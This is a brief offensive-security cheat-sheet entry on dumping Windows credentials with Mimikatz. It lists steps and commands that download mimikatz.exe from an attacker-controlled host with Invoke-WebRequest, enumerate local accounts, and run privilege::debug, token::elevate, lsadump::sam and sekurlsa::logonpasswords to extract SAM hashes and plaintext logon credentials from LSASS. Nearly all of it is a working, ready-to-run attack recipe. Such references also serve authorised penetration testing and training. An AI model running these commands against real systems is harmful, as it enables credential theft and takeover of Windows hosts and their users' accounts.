Dump Credentials with Mimikatz
credentialswindowstool
Summary
Transfer and run Mimikatz to enable debug privileges, then dump SAM hashes and cached logon credentials from LSASS.
Walkthrough
Mimikatz extracts hashes and plaintext credentials from a Windows host, given local admin / SeDebugPrivilege.
Steps
- Transfer the binary to the target (e.g.
Invoke-WebRequestintoC:\Users\Public). - Optionally confirm local accounts and groups first with
Get-LocalUser/Get-LocalGroup. - In the Mimikatz console, run
privilege::debug(andtoken::elevate) to gain the rights needed for memory access. - Dump local SAM hashes with
lsadump::samand cached/active logon credentials withsekurlsa::logonpasswords.
Commands
powershell
Invoke-WebRequest http://<IP>:8081/mimikatz.exe -OutFile C:\Users\Public\mimikatz.exe
powershell
Get-LocalUser Get-LocalGroup
other
privilege::debug token::elevate lsadump::sam sekurlsa::logonpasswords